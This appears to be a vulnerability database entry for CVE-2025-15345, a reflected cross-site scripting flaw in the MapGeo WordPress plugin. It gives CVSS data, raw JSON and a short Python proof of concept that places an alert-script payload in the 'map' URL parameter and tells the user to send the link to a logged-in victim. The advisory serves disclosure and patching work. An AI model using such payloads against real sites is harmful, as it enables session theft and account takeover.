Security Vulnerability Report
中文
CVE-2025-15345 CVSS 6.1 MEDIUM

CVE-2025-15345

Published: 2026-05-14 06:16:21
Last Modified: 2026-05-14 14:29:02

Description

The MapGeo – Interactive Geo Maps plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'map' parameter in the display-map shortcode in all versions up to, and including, 1.6.27 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

MapGeo – Interactive Geo Maps <= 1.6.27

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2025-15345 # Vulnerable Parameter: map in display-map shortcode # Usage: Access the URL below in a browser while logged into a page containing the shortcode or if the shortcode processes global GET requests. import urllib.parse payload = "<script>alert('CVE-2025-15345');</script>" # Example URL structure (assuming a page exists that renders the map) # The 'map' parameter is reflected unsanitized. base_url = "http://target-wordpress-site.com/page-with-map/" exploit_url = f"{base_url}?map={urllib.parse.quote(payload)}" print(f"[+] Exploit URL: {exploit_url}") print("[+] Send this URL to an authenticated user to trigger the XSS.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15345", "sourceIdentifier": "[email protected]", "published": "2026-05-14T06:16:21.027", "lastModified": "2026-05-14T14:29:01.600", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The MapGeo – Interactive Geo Maps plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'map' parameter in the display-map shortcode in all versions up to, and including, 1.6.27 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-80"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?old_path=/interactive-geo-maps/tags/1.6.27/src/Plugin/Map.php&new_path=/interactive-geo-maps/tags/1.6.28/src/Plugin/Map.php", "source": "[email protected]"}, {"url": "https://research.cleantalk.org/cve-2025-15345", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/bfccbf41-c861-4bf1-b400-7858cb255b9a?source=cve", "source": "[email protected]"}]}}